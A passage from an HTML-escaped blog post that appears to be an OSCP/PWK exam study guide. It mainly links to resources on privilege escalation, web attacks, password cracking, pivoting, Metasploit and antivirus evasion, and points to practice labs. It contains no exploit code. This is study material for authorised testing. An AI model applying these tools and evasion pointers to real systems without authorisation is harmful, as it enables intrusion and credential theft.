&lt;a href=&quot;https://blog.ropnop.com/transferring-files-from-kali-to-windows/&quot;&gt;https://blog.ropnop.com/transferring-files-from-kali-to-windows/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Another tool I found interesting for transferring files on Windows systems is bitsadmin. It is a command-line tool that you can use to create download or upload jobs and monitor their progress. 
You can find examples of how to use the tool here: 
&lt;a href=&quot;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-examples&quot;&gt;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-examples&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Another tool you can check out is &lt;a href=&quot;https://github.com/SecureAuthCorp/impacket&quot;&gt;Impacket&lt;/a&gt;. It contains a collection of Python classes for working with network protocols that you can use to interact with target networks and parse raw data, and its example scripts can be used to transfer files to or from your target host.&lt;/p&gt;

&lt;p&gt;Also check out Python modules like these:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;python -m SimpleHTTPServer 80&lt;/code&gt;: Spins up a Python 2 web server serving the directory you are in on port 80.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;python3 -m http.server 80&lt;/code&gt;: Spins up a Python 3.X web server serving the directory you are in on port 80.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;python -m pyftpdlib -p 21 -w&lt;/code&gt;: Spins up an FTP server serving the directory you are in on port 21; the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-w&lt;/code&gt; flag allows anonymous write access.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;python3 -m pyftpdlib -p 21 -w&lt;/code&gt;: Spins up the same FTP server under Python 3.X, serving the directory you are in on port 21 with anonymous write access.&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-9-privilege-escalation&quot;&gt;Section 9: Privilege Escalation&lt;/h1&gt;
&lt;p&gt;In this section you will find a lot of techniques, ranging from getting administrative access through a kernel exploit to abusing a misconfigured service. The possibilities are endless, so make sure you find the ones that work for you. To get an understanding of this section, I recommend applying your knowledge on Vulnhub or Hackthebox to improve your skills in this area. I know there are scripts for automating this process, but at some point those scripts can miss something very important on your target that you need in order to escalate your privileges. Something you should keep in mind :D.&lt;br /&gt;
I am going to break this section into two parts: Windows and Linux Privilege Escalation Techniques.&lt;/p&gt;

&lt;h5 id=&quot;windows-privilege-escalation-guides&quot;&gt;Windows Privilege Escalation Guides:&lt;/h5&gt;
&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Fuzzysecurity Windows Privilege Escalation Fundamentals: Shout out to fuzzysec for taking the time to write this, because it is an amazing guide that will help you understand privilege escalation techniques in Windows. 
&lt;a href=&quot;http://www.fuzzysecurity.com/tutorials/16.html&quot;&gt;http://www.fuzzysecurity.com/tutorials/16.html&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Pwnwiki Windows Privilege Escalation Commands: 
&lt;a href=&quot;http://pwnwiki.io/#!privesc/windows/index.md&quot;&gt;http://pwnwiki.io/#!privesc/windows/index.md&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Absolomb’s Security Blog: Windows Privilege Escalation Guide
&lt;a href=&quot;https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/&quot;&gt;https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Pentest.blog: Windows Privilege Escalation Methods for Pentesters
&lt;a href=&quot;https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/&quot;&gt;https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Windows Privilege Escalation Tools:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;JAWS (Created by 411Hall): A cool Windows enumeration script written in PowerShell. 
&lt;a href=&quot;https://github.com/411Hall/JAWS/commits?author=411Hall&quot;&gt;https://github.com/411Hall/JAWS/commits?author=411Hall&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Windows Exploit Suggester (Created by GDSSecurity): A Python script that compares the target's patch level against the Microsoft vulnerability database to detect any missing patches on the target.
&lt;a href=&quot;https://github.com/GDSSecurity/Windows-Exploit-Suggester&quot;&gt;https://github.com/GDSSecurity/Windows-Exploit-Suggester&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Windows Exploit Suggester Next Generation: &lt;a href=&quot;https://github.com/bitsadmin/wesng&quot;&gt;https://github.com/bitsadmin/wesng&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Sherlock (Created by RastaMouse): Another cool PowerShell script that finds missing software patches for local privilege escalation techniques in Windows. 
&lt;a href=&quot;https://github.com/rasta-mouse/Sherlock&quot;&gt;https://github.com/rasta-mouse/Sherlock&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Other Resources for Windows Privilege Escalation Techniques: 
&lt;a href=&quot;https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194&quot;&gt;https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;h5 id=&quot;linux-privilege-escalation-guides&quot;&gt;Linux Privilege Escalation Guides:&lt;/h5&gt;
&lt;p&gt;The only guide I ever really used to understand privilege escalation techniques on Linux systems was g0tmi1k's post. In my opinion this blog post is a must-read for everyone preparing for the OSCP. You can find his guide here: 
&lt;a href=&quot;https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/&quot;&gt;https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;GTFOBins (I have to thank Ippsec for sharing this with me): Contains a curated list of Unix binaries that can be abused by an attacker to bypass local security restrictions on a Linux system.
&lt;a href=&quot;https://gtfobins.github.io/&quot;&gt;https://gtfobins.github.io/&lt;/a&gt;&lt;/p&gt;

&lt;h5 id=&quot;linux-privilege-escalation-tools&quot;&gt;Linux Privilege Escalation Tools:&lt;/h5&gt;
&lt;p&gt;LinEnum: A great Linux privilege escalation checker that is still maintained by the guys at rebootuser.com. You can find their tool here: 
&lt;a href=&quot;https://github.com/rebootuser/LinEnum&quot;&gt;https://github.com/rebootuser/LinEnum&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Linux Exploit Suggester 2: &lt;a href=&quot;https://github.com/jondonas/linux-exploit-suggester-2&quot;&gt;https://github.com/jondonas/linux-exploit-suggester-2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;One thing I will mention: if you want to practice your Linux privilege escalation, I highly recommend you take a look at the Lin.Security vulnerable box created by in.security! The box was designed to help people understand how certain misconfigured applications and services can be easily abused by an attacker. This box really helped me improve my privilege escalation skills and techniques on Linux systems.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Main Link: &lt;a href=&quot;https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/&quot;&gt;https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Backup: &lt;a href=&quot;https://www.vulnhub.com/entry/linsecurity-1,244/&quot;&gt;https://www.vulnhub.com/entry/linsecurity-1,244/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-10-client-side-attacks&quot;&gt;Section 10: Client-Side Attacks&lt;/h1&gt;
&lt;p&gt;Client-side attacks usually require user interaction, so it’s good to understand how they work and how you can set one up. For instance, check out the Client Side Attacks section in Metasploit Unleashed: &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;section-11-web-application-attacks&quot;&gt;Section 11: Web Application Attacks&lt;/h1&gt;
&lt;p&gt;This is the section I spent most of my time on while preparing for PWK and OSCP. In this section you need to understand the following web attacks:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Cross-site scripting (XSS): 
OWASP: &lt;a href=&quot;https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)&quot;&gt;https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;SQL Injections: 
OWASP: &lt;a href=&quot;https://www.owasp.org/index.php/SQL_Injection&quot;&gt;https://www.owasp.org/index.php/SQL_Injection&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Pentest Monkey SQL Cheat Sheets: &lt;a href=&quot;http://pentestmonkey.net/category/cheat-sheet/sql-injection&quot;&gt;http://pentestmonkey.net/category/cheat-sheet/sql-injection&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;File Inclusion Vulnerabilities: 
&lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;h5 id=&quot;tools-for-finding-web-vulnerabilities-and-conducting-web-attacks&quot;&gt;Tools for finding Web Vulnerabilities and conducting Web Attacks:&lt;/h5&gt;
&lt;p&gt;Burp Suite:&lt;/p&gt;

&lt;p&gt;A popular web application vulnerability scanner that contains a variety of features and plugins to identify web vulnerabilities in web applications. The tool uses an interception proxy that your browser connects to, so that traffic is routed through the Burp Suite proxy. Once the interception proxy is configured you can start capturing and analyzing each request to and from the target web application. With these captured requests a penetration tester can analyze, manipulate, and fuzz individual HTTP requests in order to identify potential parameters or injection points manually.&lt;/p&gt;

&lt;p&gt;Bugcrowd University has a webinar created by Jason Haddix that explains Burp Suite and how to use it. You can find the recording here: 
&lt;a href=&quot;https://www.bugcrowd.com/resource/introduction-to-burp-suite/&quot;&gt;https://www.bugcrowd.com/resource/introduction-to-burp-suite/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SQL Injection Tools: 
I would not recommend using these tools until you have a clear understanding of SQL databases and how a SQL injection works. The tools below make it easy to automate the process of conducting a SQL injection, but they can also cause issues for a target's SQL database. Here is a list of tools that I have played with to get a better understanding of how you can automate SQL injections:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;SQLmap: &lt;a href=&quot;https://github.com/sqlmapproject/sqlmap/wiki/Usage&quot;&gt;https://github.com/sqlmapproject/sqlmap/wiki/Usage&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;NoSQLMap: &lt;a href=&quot;https://github.com/codingo/NoSQLMap&quot;&gt;https://github.com/codingo/NoSQLMap&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SQLNinja: &lt;a href=&quot;http://sqlninja.sourceforge.net/&quot;&gt;http://sqlninja.sourceforge.net/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Nikto (Created by Chris Sullo): 
A web server scanner that performs comprehensive tests against web servers for multiple items. It can scan the web application for vulnerabilities, check server configuration items such as multiple index files and HTTP server options, and attempt to identify the installed version of the web server and any plugins/software running on it. Please keep in mind that this tool can be very noisy when scanning a target's web server.&lt;/p&gt;

&lt;p&gt;Link: &lt;a href=&quot;https://cirt.net/Nikto2&quot;&gt;https://cirt.net/Nikto2&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Web Directory Scanners:&lt;/p&gt;

&lt;p&gt;These tools are designed to brute force site structure, including directories and files, on websites. They can identify hidden directory structures or web pages that come in handy when you are in the labs or during an assessment.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Dirsearch: &lt;a href=&quot;https://github.com/maurosoria/dirsearch&quot;&gt;https://github.com/maurosoria/dirsearch&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Dirbuster: &lt;a href=&quot;https://tools.kali.org/web-applications/dirbuster&quot;&gt;https://tools.kali.org/web-applications/dirbuster&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Gobuster: &lt;a href=&quot;https://github.com/OJ/gobuster&quot;&gt;https://github.com/OJ/gobuster&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Wfuzz: &lt;a href=&quot;https://github.com/xmendez/wfuzz&quot;&gt;https://github.com/xmendez/wfuzz&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h5 id=&quot;hands-on-areas-to-improve-your-web-attack-skills&quot;&gt;Hands on areas to improve your web attack skills:&lt;/h5&gt;
&lt;ul&gt;
  &lt;li&gt;Metasploitable 2: Contains vulnerable web applications such as &lt;a href=&quot;https://github.com/webpwnized/mutillidae&quot;&gt;Mutillidae&lt;/a&gt; and the &lt;a href=&quot;http://www.dvwa.co.uk/&quot;&gt;Damn Vulnerable Web App (DVWA)&lt;/a&gt; that you can use to improve your web skills.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Link to download the machine: &lt;a href=&quot;https://metasploit.help.rapid7.com/docs/metasploitable-2&quot;&gt;https://metasploit.help.rapid7.com/docs/metasploitable-2&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Backup Link: &lt;a href=&quot;https://www.vulnhub.com/entry/metasploitable-2,29/&quot;&gt;https://www.vulnhub.com/entry/metasploitable-2,29/&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Exploitability Guide: &lt;a href=&quot;https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide&quot;&gt;https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;OWASP Juice Shop: Another vulnerable web application that contains a variety of challenges to improve your web skills. 
&lt;a href=&quot;https://www.owasp.org/index.php/OWASP_Juice_Shop_Project&quot;&gt;https://www.owasp.org/index.php/OWASP_Juice_Shop_Project&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Overthewire Natas: A set of web-based wargame challenges; each level must be completed in order to move on to the next. I really enjoyed their challenges when I did them! 
&lt;a href=&quot;http://overthewire.org/wargames/natas/&quot;&gt;http://overthewire.org/wargames/natas/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Other resources: 
Hack This Site: &lt;a href=&quot;https://www.hackthissite.org/&quot;&gt;https://www.hackthissite.org/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-12-password-cracking&quot;&gt;Section 12: Password Cracking&lt;/h1&gt;
&lt;p&gt;In this section you need to understand the basics of password attacks. Identify the differences between Windows (NTLM) hashes and Linux hashes. In addition, you will also need to understand the different tools that you can use to conduct online and offline password attacks. Here is a list of resources that I have used that helped me better understand how password cracking works:&lt;/p&gt;

&lt;p&gt;Introduction to Password Cracking: &lt;a href=&quot;https://alexandreborgesbrazil.files.wordpress.com/2013/08/introduction_to_password_cracking_part_1.pdf&quot;&gt;https://alexandreborgesbrazil.files.wordpress.com/2013/08/introduction_to_password_cracking_part_1.pdf&lt;/a&gt;&lt;/p&gt;

&lt;h5 id=&quot;offline-tools-for-password-cracking&quot;&gt;Offline Tools for Password Cracking:&lt;/h5&gt;
&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Hashcat: &lt;a href=&quot;https://hashcat.net/hashcat/&quot;&gt;https://hashcat.net/hashcat/&lt;/a&gt; 
Sample Hashes to test with Hashcat: &lt;a href=&quot;https://hashcat.net/wiki/doku.php?id=example_hashes&quot;&gt;https://hashcat.net/wiki/doku.php?id=example_hashes&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;John the Ripper: &lt;a href=&quot;https://www.openwall.com/john/&quot;&gt;https://www.openwall.com/john/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Metasploit Unleashed using John the Ripper with Hashdump: &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/john-ripper/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/john-ripper/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Online Tools for Password Cracking:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;THC Hydra: &lt;a href=&quot;https://github.com/vanhauser-thc/thc-hydra&quot;&gt;https://github.com/vanhauser-thc/thc-hydra&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Medusa: &lt;a href=&quot;http://h.foofus.net/?page_id=51&quot;&gt;http://h.foofus.net/?page_id=51&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Wordlist generators:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Cewl: &lt;a href=&quot;https://digi.ninja/projects/cewl.php&quot;&gt;https://digi.ninja/projects/cewl.php&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Crunch: &lt;a href=&quot;https://tools.kali.org/password-attacks/crunch&quot;&gt;https://tools.kali.org/password-attacks/crunch&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Wordlists:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;In Kali: /usr/share/wordlists&lt;/li&gt;
  &lt;li&gt;SecLists: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;apt-get install seclists&lt;/code&gt;. 
 You can find all of Daniel Miessler's password lists here: &lt;a href=&quot;https://github.com/danielmiessler/SecLists/tree/master/Passwords&quot;&gt;https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h5 id=&quot;online-password-crackers&quot;&gt;Online Password Crackers:&lt;/h5&gt;
&lt;p&gt;I usually went to these first to see if they already had the hash cracked in their database. However, don’t use these online crackers as your main tool for everything. Uploading a hash from an engagement can be a huge risk, so make sure you use your offline tools to crack those types of hashes. Here is a list of online hash crackers that I found that you can use to crack hashes:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://hashkiller.io/listmanager&quot;&gt;https://hashkiller.io&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.cmd5.org/&quot;&gt;https://www.cmd5.org/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.onlinehashcrack.com/&quot;&gt;https://www.onlinehashcrack.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://gpuhash.me/&quot;&gt;https://gpuhash.me/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://crackstation.net/&quot;&gt;https://crackstation.net/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://crack.sh/&quot;&gt;https://crack.sh/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://passwordrecovery.io/&quot;&gt;https://passwordrecovery.io/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://cracker.offensive-security.com/&quot;&gt;http://cracker.offensive-security.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Resources for Password Cracking:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Pwning Wordpress Passwords: &lt;a href=&quot;https://medium.com/bugbountywriteup/pwning-wordpress-passwords-2caf12216956&quot;&gt;https://medium.com/bugbountywriteup/pwning-wordpress-passwords-2caf12216956&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-13-port-redirection-and-pivoting&quot;&gt;Section 13: Port Redirection and Pivoting&lt;/h1&gt;
&lt;p&gt;Depending on your scope, some of the machines may not be directly accessible. There are dual-homed systems out there that provide a path into an internal network. You will need to know some of these techniques in order to obtain access to those non-public networks:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Abatchy’s Port Forwarding Guide: &lt;a href=&quot;https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide&quot;&gt;https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Windows Port Forwarding: &lt;a href=&quot;http://woshub.com/port-forwarding-in-windows/&quot;&gt;http://woshub.com/port-forwarding-in-windows/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SSH Tunneling Explained: &lt;a href=&quot;https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/&quot;&gt;https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Understanding Proxy Tunnels: &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/proxytunnels/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/proxytunnels/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Understanding Port forwarding with Metasploit: &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/portfwd/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/portfwd/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Explore Hidden Networks with Double Pivoting: &lt;a href=&quot;https://pentest.blog/explore-hidden-networks-with-double-pivoting/&quot;&gt;https://pentest.blog/explore-hidden-networks-with-double-pivoting/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;0xdf hacks stuff. Pivoting and Tunneling: &lt;a href=&quot;https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html&quot;&gt;https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools to help you with Port Forwarding and Pivoting:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Proxychains: &lt;a href=&quot;https://github.com/haad/proxychains&quot;&gt;https://github.com/haad/proxychains&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Proxychains-ng: &lt;a href=&quot;https://github.com/rofl0r/proxychains-ng&quot;&gt;https://github.com/rofl0r/proxychains-ng&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;sshuttle (I totally recommend learning this): &lt;a href=&quot;https://github.com/sshuttle/sshuttle&quot;&gt;https://github.com/sshuttle/sshuttle&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SSHuttle Documentation: &lt;a href=&quot;https://sshuttle.readthedocs.io/en/stable/&quot;&gt;https://sshuttle.readthedocs.io/en/stable/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vulnerable systems to practice pivoting:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Wintermute: &lt;a href=&quot;https://www.vulnhub.com/entry/wintermute-1,239/&quot;&gt;https://www.vulnhub.com/entry/wintermute-1,239/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-14-metasploit-framework&quot;&gt;Section 14: Metasploit Framework&lt;/h1&gt;
&lt;p&gt;The only guide that I used to learn more about Metasploit is Offensive Security Metasploit Unleashed course…which is free!
&lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Other Resources: 
Metasploit The Penetration Tester’s Guide (A super awesome book to read): &lt;a href=&quot;https://nostarch.com/metasploit&quot;&gt;https://nostarch.com/metasploit&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Msfvenom Cheat Sheets:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://netsec.ws/?p=331&quot;&gt;https://netsec.ws/?p=331&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom&quot;&gt;https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-15-antivirus-bypassing&quot;&gt;Section 15: Antivirus Bypassing&lt;/h1&gt;
&lt;p&gt;I did not spend too much time learning about this section since Metasploit encodes its payloads to bypass most anti-virus (well, older versions at least). The course is pretty straightforward in this section.&lt;/p&gt;

&lt;p&gt;Tools to play with Anti-Virus evasion:
Veil-Framework: &lt;a href=&quot;https://github.com/Veil-Framework/Veil&quot;&gt;https://github.com/Veil-Framework/Veil&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;extra-resources&quot;&gt;Extra Resources&lt;/h1&gt;

&lt;p&gt;This concludes the resources I have used that helped me understand the course syllabus. Now I will share with you some tips and extra resources that I used during my preparation for the PWK/OSCP.&lt;/p&gt;

&lt;h1 id=&quot;setting-up-your-pentesting-environment&quot;&gt;Setting up your Pentesting Environment:&lt;/h1&gt;
&lt;p&gt;The course recommends using &lt;a href=&quot;https://www.vmware.com/&quot;&gt;VMware products&lt;/a&gt; to run the custom Kali Linux image they have created. Windows users can purchase &lt;a href=&quot;https://www.vmware.com/products/workstation-pro.html&quot;&gt;VMware Workstation&lt;/a&gt; or use the free &lt;a href=&quot;https://www.vmware.com/products/workstation-player.html&quot;&gt;VMware Player&lt;/a&gt;. Mac users will need to use &lt;a href=&quot;https://www.vmware.com/products/fusion.html&quot;&gt;VMware Fusion&lt;/a&gt;. 
If you would like to download the custom Kali Linux System for the PWK you can find it here:&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://images.offensive-security.com/pwk-kali-vm.7z&quot;&gt;https://images.offensive-security.com/pwk-kali-vm.7z&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Keep in mind that Offensive Security does update their images from time to time. Personally, I only used their image for completing the lab exercises and I had a separate Kali Linux image that I customized to use for the labs and exam.&lt;/p&gt;

&lt;p&gt;Another virtual machine I created was a Windows 7 32-bit system to spin up any vulnerable applications I needed to debug, or to check whether I could obtain a shell from them. You could also create a Windows 7 64-bit system, but some 32-bit applications may not behave the way they would on an actual 32-bit system. This practice is great to have in place in case you are stuck on a Windows system running a service that, for some reason, you cannot obtain a shell on.&lt;/p&gt;

&lt;h1 id=&quot;wargameshands-on-challenges&quot;&gt;Wargames/Hands-on Challenges:&lt;/h1&gt;
&lt;p&gt;I know I stated these before, but I am going to reiterate them:&lt;/p&gt;

&lt;p&gt;OverTheWire Bandit:
A good set of fun Linux challenges to familiarize yourself with bash and Linux. Abatchy's walkthroughs really helped me here:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Bandit 1-5: &lt;a href=&quot;https://www.abatchy.com/2016/10/overthewire-bandit-0-5&quot;&gt;https://www.abatchy.com/2016/10/overthewire-bandit-0-5&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Bandit 6-10: &lt;a href=&quot;https://www.abatchy.com/2016/10/overthewire-bandit-6-10&quot;&gt;https://www.abatchy.com/2016/10/overthewire-bandit-6-10&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Bandit 11-15: &lt;a href=&quot;https://www.abatchy.com/2016/10/overthewire-bandit-11-15&quot;&gt;https://www.abatchy.com/2016/10/overthewire-bandit-11-15&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Bandit 16-20: &lt;a href=&quot;https://www.abatchy.com/2016/10/overthewire-bandit-16-20&quot;&gt;https://www.abatchy.com/2016/10/overthewire-bandit-16-20&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Bandit 21-26: &lt;a href=&quot;https://www.abatchy.com/2016/10/overthewire-bandit-21-24&quot;&gt;https://www.abatchy.com/2016/10/overthewire-bandit-21-24&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;OverTheWire Natas: 
A good set of simple web application challenges. These challenges will help you understand the basics you need to identify issues in web applications. 
Check out this walkthrough here: &lt;a href=&quot;https://infamoussyn.wordpress.com/2014/02/05/overthewire-natas-level-0-16-writeup-updated/&quot;&gt;https://infamoussyn.wordpress.com/2014/02/05/overthewire-natas-level-0-16-writeup-updated/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;UndertheWire: 
Probably my favorite place for challenges because they contain a huge set of PowerShell challenges. 
You can find their challenges here: &lt;a href=&quot;http://www.underthewire.tech/wargames.htm&quot;&gt;http://www.underthewire.tech/wargames.htm&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Root-me.org: A huge place that has challenges for almost everything in cybersecurity. For instance, you will see challenges in the following areas:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Network Forensics (Packet Analysis, Captured Traffic, Network Services)&lt;/li&gt;
  &lt;li&gt;Programming (C, PHP, Java, Shell-coding)&lt;/li&gt;
  &lt;li&gt;Reverse Engineering (disassemble applications)&lt;/li&gt;
  &lt;li&gt;Web Applications and Client Challenges.&lt;/li&gt;
  &lt;li&gt;Forensic Challenges.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Spend a few minutes going through some of these!&lt;/p&gt;

